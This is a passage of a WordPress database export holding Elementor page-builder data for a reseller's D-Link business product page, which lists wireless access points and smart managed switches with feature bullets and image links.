SFP+, Two 10 Gigabit Base-T \\/SFP+ Combo Ports<br \\/>\\u2022 Suitable for virtualization, cloud services and server-to-server applications<br \\/>\\u2022 D-link Green Technology conserves energy by powering down unused ports<br \\/>\\u2022 Auto Surveillance (ASV), Auto Voice VLAN for VoIP and Video Surveillance deployments.<br \\/>\\u2022 Support G.8032 ERPS to achieve high reliability and network stability<br \\/>\\u2022 802.1X port based authentication, for authentication through external RADIUS servers<br \\/>\\u2022 Support D-Link Network Assistant Utility to simplifies the configuration<br \\/>\\u2022 Loopback Detection automatically disables port or VLAN when a loop is detected<br \\/>\\u2022 Support IGMP &amp; MLD Snooping and 802.3x Flow Control<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2887756\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"7526ebb\",\"elType\":\"widget\",\"settings\":{\"title\":\"26-Port Layer 2 Lite Smart Managed Gigabit Switch\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"bf0db0d\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/DGS-1100-26-front-510x600-510x600.jpg\",\"id\":2654}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"b0830af\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u2022 24 Port 10\\/100\\/1000 Base-T with 2 Gigabit SFP Ports<br \\/>\\u2022 Equipped with 802.3az Energy Efficient Ethernet (EEE) Complaint<br \\/>\\u2022 Support IEEE 802.1Q VLAN traffic segregation<br \\/>\\u2022 Auto Surveillance VLAN for easy integration with IP-based surveillance systems<br \\/>\\u2022 Loopback detection (LBD) and broadcast storm control to avoid network downtime<br \\/>\\u2022 Quality of Service (QOS) and bandwidth control to ensure smooth operation<br \\/>\\u2022 Cable diagnostics function to help troubleshooting wiring problem<br \\/>\\u2022 Support Web-based GUI, Smart Console , Network Assistance Utility<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"6377d4b\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"68b593a\",\"elType\":\"widget\",\"settings\":{\"title\":\"10 Gigabit Ethernet Smart Managed Switches\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"659046d\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/ProductMainImage1-510x600-1.png\",\"id\":2645}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"b9868b3\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>10 Gigabit Ethernet Connection<\\/p><p>Improved Power Efficiency<\\/p><p>Smart and Flexible Management<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"9040bdd\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\"},\"elements\":[{\"id\":\"3a1bef1\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"space_between_widgets\":29},\"elements\":[{\"id\":\"46339e5\",\"elType\":\"widget\",\"settings\":{\"title\":\"52-Port Layer 2 Smart Managed Gigabit PoE Switch\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"5f3d924\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/DGS-1210-52MPP_E1_Image-LFront-510x600-510x600.jpg\",\"id\":2646}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"5759169\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u2022 48 Ports 10\\/100\\/1000 Base-T PoE + 4 slots for Gigabit SFP<br \\/>\\u2022 Support IEEE 802.3af , 802.3at POE with Power Budget up to 740 W<br \\/>\\u2022 Equipped with IEEE 802.3az Energy Efficient Ethernet (EEE) Complaint<br \\/>\\u2022 Support IEEE 802.1Q VLAN traffic segregation<br \\/>\\u2022 Access Control List (ACL) feature to enhances network security<br \\/>\\u2022 Auto Surveillance VLAN for easy integration with IP-based surveillance systems<br \\/>\\u2022 Loopback detection (LBD) and broadcast storm control to avoid network downtime<br \\/>\\u2022 Quality of Service (QOS) and bandwidth control to ensure smooth operation<br \\/>\\u2022 Support Web-based GUI, Smart Console , Network Assistance Utility<br \\/>\\u2022 Cable diagnostics function to help troubleshooting wiring problem<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"30bbd67\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"cdf28d5\",\"elType\":\"widget\",\"settings\":{\"title\":\"52-Port Layer 3 Lite Smart Managed Gigabit Switch with 2 10G Uplink\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"db53704\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/DES-1510-52-510x600.jpg\",\"id\":2647}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"37182c4\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u2022 48 Ports 10\\/100\\/1000 Base-T + 2 SFP Ports + 2 x 10G SFP+ Slots<\\/p><p>\\u2022\\u00a0Physical Stacking via two 10 Gigabit SFP+ Ports with stacking up to six device<\\/p><p>\\u2022\\u00a0Virtual stacking of up to 32 units via D-link\\u2019s\\u00a0Single IP\\u00a0Management (SIM)<\\/p><p>\\u2022\\u00a0Built-in SNMP MIB for remote Network\\u00a0Management Systems<\\/p><p>\\u2022\\u00a0Support G.8032 ERPS to achieve high reliability \\u00a0and network stability<\\/p><p>\\u2022\\u00a0Auto Surveillance (ASV), Auto Voice\\u00a0VLAN for VoIP and Video Surveillance deployments.<\\/p><p>\\u2022\\u00a0802.1X port based\\u00a0authentication, for authentication through\\u00a0external RADIUS servers<\\/p><p>\\u2022\\u00a0IEEE 802.3az Energy Efficient Ethernet with \\u00a0D-Link Green 3.0 power-saving features<\\/p><p>\\u2022\\u00a0Loopback Detection automatically disables port or VLAN when a loop is detected<\\/p><p>\\u2022\\u00a0Support\\u00a0Layer 2 Features \\u2013\\u00a0IGMP &amp; MLD Snooping, 802.3x \\u00a0Flow control \\u00a0and LLDP<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"38f0a9a\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"4be48a8\",\"elType\":\"widget\",\"settings\":{\"title\":\"28-Port Layer 3 Lite Smart Managed Gigabit PoE Switch with 4 10G uplink\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"3f346e9\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/DGS-1510-28XMP_A1_Image-LFront-510X600-510x600.jpg\",\"id\":2648}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"052fb2e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u2022 24 Ports 10\\/100\\/1000 Base-T PoE + 4 x 10G SFP+ Slots<\\/p><p>\\u2022\\u00a0Support IEEE 802.3af (PoE) and 802.3at (PoE+) \\u00a0with Power Budget of 370W<\\/p><p>\\u2022\\u00a0Physical Stacking via two 10 Gigabit SFP+ Ports with stacking up to six device<\\/p><p>\\u2022\\u00a0Virtual stacking of up to 32 units via D-link\\u2019s\\u00a0Single IP\\u00a0Management (SIM)<\\/p><p>\\u2022\\u00a0Support G.8032 ERPS to achieve high reliability \\u00a0and network stability<\\/p><p>\\u2022\\u00a0Auto Surveillance (ASV), Auto Voice\\u00a0VLAN for VoIP and Video Surveillance deployments.<\\/p><p>\\u2022\\u00a0802.1X port based\\u00a0authentication, for authentication through\\u00a0external RADIUS servers<\\/p><p>\\u2022\\u00a0IEEE 802.3az Energy Efficient Ethernet with \\u00a0D-Link Green 3.0 power-saving features<\\/p><p>\\u2022\\u00a0Loopback Detection automatically disables port or VLAN when a loop is detected<\\/p><p>\\u2022\\u00a0Support\\u00a0Layer 2 Features \\u2013\\u00a0IGMP &amp; MLD Snooping, 802.3x \\u00a0Flow control \\u00a0and LLDP<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"17edb25\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"98c3571\",\"elType\":\"widget\",\"settings\":{\"title\":\"28-Port Layer 3 Lite Smart Managed Gigabit Switch with 4 10G uplink\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"a2dc1a5\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/DGS-1510-28X-510x600.jpg\",\"id\":2649}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"82006f7\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u2022 24 Ports 10\\/100\\/1000 Base-T PoE + 4 x 10G SFP+ Slots<\\/p><p>\\u2022\\u00a0Physical Stacking via two 10 Gigabit SFP+ Ports with stacking up to six device<\\/p><p>\\u2022\\u00a0Virtual stacking of up to 32 units via D-link\\u2019s\\u00a0Single IP\\u00a0Management (SIM)<\\/p><p>\\u2022\\u00a0Support G.8032 ERPS to achieve high reliability \\u00a0and network stability<\\/p><p>\\u2022\\u00a0Auto Surveillance (ASV), Auto Voice\\u00a0VLAN for VoIP and Video Surveillance deployments.<\\/p><p>\\u2022\\u00a0802.1X port based\\u00a0authentication, for authentication through\\u00a0external RADIUS servers<\\/p><p>\\u2022\\u00a0IEEE 802.3az Energy Efficient Ethernet with \\u00a0D-Link Green 3.0 power-saving features<\\/p><p>\\u2022\\u00a0Loopback Detection automatically disables port or VLAN when a loop is detected<\\/p><p>\\u2022\\u00a0Support\\u00a0Layer 2 Features \\u2013\\u00a0IGMP &amp; MLD Snooping, 802.3x \\u00a0Flow control \\u00a0and LLDP<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(7212,3359,'_elementor_version','2.5.14'),(7213,3359,'_elementor_edit_mode','builder'),(7216,3360,'_wp_page_template','template-fullwidth.php'),(7217,3360,'_elementor_template_type','post'),(7218,3360,'_elementor_data','[{\"id\":\"1f43283\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"26b7848\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"3963540\",\"elType\":\"widget\",\"settings\":{\"title\":\"D - Link Business Solution Product \",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"01972e4\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"d52d974\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"cee2f63\",\"elType\":\"widget\",\"settings\":{\"title\":\"\",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f179b24\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"6dd0023\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"2445e57\",\"elType\":\"widget\",\"settings\":{\"title\":\"Business Wireless\",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"87263a7\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"670851a\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"space_between_widgets\":49},\"elements\":[{\"id\":\"8492236\",\"elType\":\"widget\",\"settings\":{\"title\":\"AC1750 Wave 2 Dual\\u2011Band WI-FI PoE Access Point\\u200b\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"46550cc\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/dap-2680-features3.png\",\"id\":2359}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"d3dd31e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u00a0802.11ac Wave 2 wireless, up to 1.75 Gbps<\\/p><p>MU-MIMO with beamforming<\\/p><p>Band steering<\\/p><p>Gigabit PoE-capable LAN port<\\/p><p>AP Array utility support<\\/p><p>Free D-Link Central WiFiManager<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"ed243d3\",\"elType\":\"widget\",\"settings\":{\"editor\":\"\",\"_margin\":{\"unit\":\"px\",\"top\":\"149\",\"right\":\"149\",\"bottom\":\"149\",\"left\":\"149\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"e4eb9a0\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<center>[maxbutton id=\\\"6\\\" ]<\\/center>\",\"_margin\":{\"unit\":\"px\",\"top\":\"50\",\"right\":\"50\",\"bottom\":\"50\",\"left\":\"50\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2bd1d30\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"space_between_widgets\":23},\"elements\":[{\"id\":\"5df83e1\",\"elType\":\"widget\",\"settings\":{\"title\":\"2.4GHz Wireless N300 Outdoor Access Point\\u200b\",\"header_size\":\"h4\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"9d80101\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/dap-3310-front-510x600.jpg\",\"id\":2360}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"47bee85\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Wireless N300 Mbps 2.4GHz Single Band Outdoor Access Point with POE Pass-Through<\\/p><p>Two 10\\/100 Ethernet ports (one supporting PoE) allow for further physical expansion<\\/p><p>Built-in 10 dBi sector antenna with high power output ensuring that wireless coverage<\\/p><p>Weather-proof design (IPX6) built to withstand harsh environments<\\/p><p>Supports multiple operation modes \\u2013 AP,WDS with AP, Client, Repeater, WISP Client &amp; Repeater<\\/p><p>Supports 802.1Q VLAN Tagging, operating with multiple SSIDs to segment traffic<\\/p><p>Provides WLAN partitioning for deployments such as wireless hot spots<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"db46566\",\"elType\":\"widget\",\"settings\":{\"editor\":\"\",\"_margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"30\",\"bottom\":\"30\",\"left\":\"30\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"864ef7a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<center>[maxbutton id=\\\"6\\\" ]<\\/center>\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"921801b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"space_between_widgets\":19},\"elements\":[{\"id\":\"3587cd7\",\"elType\":\"widget\",\"settings\":{\"title\":\"AC1750 Wireless Dual-Band PoE Access Point\\u200b\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"8c43c0a\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/ProductMainImage1-510x600.png\",\"id\":2361},\"image_size\":\"full\",\"image_custom_dimension\":{\"width\":\"1000\",\"height\":\"1000\"}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"176122c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Up to 1750 MBPS high-speed wireless performance on 802.11ac standards<\\/p><p>Support Wireless Speed of 450 MB over 2.4 GHz &amp; 1300 Mbps\\u00a0 Over 5 GHz band<\\/p><p>Support load balancing to ensure maximum performance by limiting user\\u00a0 per AP<\\/p><p>Support Wi-Fi Multimedia QoS for audio, video, and voice applications<\\/p><p>Six detachable antennas for optimal wireless coverage over 2.4 GHz\\u00a0 or 5 GHz band<\\/p><p>Two Gigabit LAN ports , One Port Support 802.at Power over Ethernet<\\/p><p>Support multiple operation \\u2013 AP, WDS with AP, WDS\\/Bridge and Client<\\/p><p>Rugged\\u00a0 metal housing &amp;\\u00a0 Plenum-rated chassis<\\/p><p>Built in Radius Server\\u00a0 allowing users to create their accounts within the device itself.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"b8d278c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<center>[maxbutton id=\\\"6\\\" ]<\\/center>\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"8c3cde4\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"6c2ecda\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"space_between_widgets\":21},\"elements\":[{\"id\":\"2ae7a13\",\"elType\":\"widget\",\"settings\":{\"title\":\"N600 Wireless Dual-Band PoE Access Point\\u200b\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"f2d465f\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/ProductMainImage-510x600.png\",\"id\":2362}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"9584be6\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u2022 802.11ac Wave 2 wireless, up to 1.75 Gbps<\\/p><p>\\u2022 MU-MIMO with beamforming<\\/p><p>\\u2022 Band steering<\\/p><p>\\u2022 Gigabit PoE-capable LAN port<\\/p><p>\\u2022 AP Array utility support<\\/p><p>\\u2022 Free D-Link Central WiFiManager<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"6a7db1b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"abb1d39\",\"elType\":\"widget\",\"settings\":{\"title\":\"AC1300 Wireless Dual-Band PoE Access Point\\u200b\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"6918a41\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/DAP-2610-featured-510x600.jpg\",\"id\":2363}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"5a1076c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Enjoy High-performance Wireless Connectivity<\\/p><p>\\u2013 Harness the power of IEEE 802.11ac Wave 2 wireless and experience wireless speeds of up to 1300 Mbps, perfect for high-demand business applications<\\/p><p>MU-MIMO with Beamforming<\\/p><p>\\u2013 Dramatically improves the wireless range and performance as well as allowing multiple devices to connect simultaneously to the wireless network<\\/p><p>Multiple Operational Modes<\\/p><p>-Flexible options allows the DAP-2610 to function as an access point, a Wireless Distribution System (WDS), a WDS with access point, or a wireless client<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"c4fc3d8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"space_between_widgets\":28},\"elements\":[{\"id\":\"6b87f5d\",\"elType\":\"widget\",\"settings\":{\"title\":\"N300 Wireless PoE Access Point\\u200b\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"3531775\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/dap-2330-front-510x600.jpg\",\"id\":2364}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"9952c2a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u2022 High-speed wireless performance with 300 Mbps wireless signal rates<\\/p><p>\\u2022 Support Wi-fi Multimedia\\u2122 (WMM) for audio, video, and voice applications<\\/p><p>\\u2022 Gigabit Ethernet port with 802.3af Power over Ethernet<\\/p><p>\\u2022 Multiple operation modes: AP, WDS with AP, WDS\\/Bridgeanf Client<\\/p><p>\\u2022 Support Inbuilt Radius server, Network Access protection (NAP)<\\/p><p>\\u2022 Equipped with 8 VLANs per band for multiple SSIDs\\u00a0 Implementation<\\/p><p>\\u2022 Support Central WiFi Manager to configure and manage multiple AP<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e416cd6\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"047b1be\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"0912f1d\",\"elType\":\"widget\",\"settings\":{\"title\":\"Smart Switch\",\"header_size\":\"h3\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f63ab97\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\"},\"elements\":[{\"id\":\"8bfc0eb\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"space_between_widgets\":23},\"elements\":[{\"id\":\"65e965e\",\"elType\":\"widget\",\"settings\":{\"title\":\"12-Port Layer 2 Smart Managed 10Gigabit Ethernet Switch\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"617e48f\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/DXS-1210-12TC_A1_Image-LFront-510x600-510x600.jpg\",\"id\":2642}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"5cada50\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u2022 8 Ports 10G Base-T + Two 10 Gigabit SFP+ Slots +2 10GBase-T\\/SFP+ Combo Slots<br \\/>\\u2022 Suitable for virtualization, cloud services and server-to-server applications<br \\/>\\u2022 D-link Green Technology conserves energy by powering down unused ports<br \\/>\\u2022 Auto Surveillance (ASV), Auto Voice VLAN for VoIP and Video Surveillance deployments.<br \\/>\\u2022 Support G.8032 ERPS to achieve high reliability and network stability<br \\/>\\u2022 802.1X port based authentication, for authentication through external RADIUS servers<br \\/>\\u2022 Support D-Link Network Assistant Utility to simplifies the configuration<br \\/>\\u2022 Loopback Detection automatically disables port or VLAN when a loop is detected<br \\/>\\u2022 Support IGMP &amp; MLD Snooping and 802.3x Flow Control<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"1528409\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"ce451cb\",\"elType\":\"widget\",\"settings\":{\"title\":\"12-Port Layer 2 Smart Managed 10Gigabit Ethernet Switch\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"b182397\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/DXS-1210-12SC_A1_Image-LFront-510x600-510x600.jpg\",\"id\":2643}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"90f4e95\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u2022 8 Ports 10G SFP+, Two 10 Gigabit Base-T \\/SFP+ Combo Ports<br \\/>\\u2022 Suitable for virtualization, cloud services and server-to-server applications<br \\/>\\u2022 D-link Green Technology conserves energy by powering down unused ports<br \\/>\\u2022 Auto Surveillance (ASV), Auto Voice VLAN for VoIP and Video Surveillance deployments.<br \\/>\\u2022 Support G.8032 ERPS to achieve high reliability and network stability<br \\/>\\u2022 802.1X port based authentication, for authentication through external RADIUS servers<br \\/>\\u2022 Support D-Link Network Assistant Utility to simplifies the configuration<br \\/>\\u2022 Loopback Detection automatically disables port or VLAN when a loop is detected<br \\/>\\u2022 Support IGMP &amp; MLD Snooping and 802.3x Flow Control<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2887756\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"7526ebb\",\"elType\":\"widget\",\"settings\":{\"title\":\"26-Port Layer 2 Lite Smart Managed Gigabit Switch\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"bf0db0d\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/DGS-1100-26-front-510x600-510x600.jpg\",\"id\":2654}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"b0830af\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u2022 24 Port 10\\/100\\/1000 Base-T with 2 Gigabit SFP Ports<br \\/>\\u2022 Equipped with 802.3az Energy Efficient Ethernet (EEE) Complaint<br \\/>\\u2022 Support IEEE 802.1Q VLAN traffic segregation<br \\/>\\u2022 Auto Surveillance VLAN for easy integration with IP-based surveillance systems<br \\/>\\u2022 Loopback detection (LBD) and broadcast storm control to avoid network downtime<br \\/>\\u2022 Quality of Service (QOS) and bandwidth control to ensure smooth operation<br \\/>\\u2022 Cable diagnostics function to help troubleshooting wiring problem<br \\/>\\u2022 Support Web-based GUI, Smart Console , Network Assistance Utility<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"6377d4b\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"68b593a\",\"elType\":\"widget\",\"settings\":{\"title\":\"10 Gigabit Ethernet Smart Managed Switches\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"659046d\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/ProductMainImage1-510x600-1.png\",\"id\":2645}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"b9868b3\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>10 Gigabit Ethernet Connection<\\/p><p>Improved Power Efficiency<\\/p><p>Smart and Flexible Management<\\/p><p>[maxbutton id=\\\"6\\\" 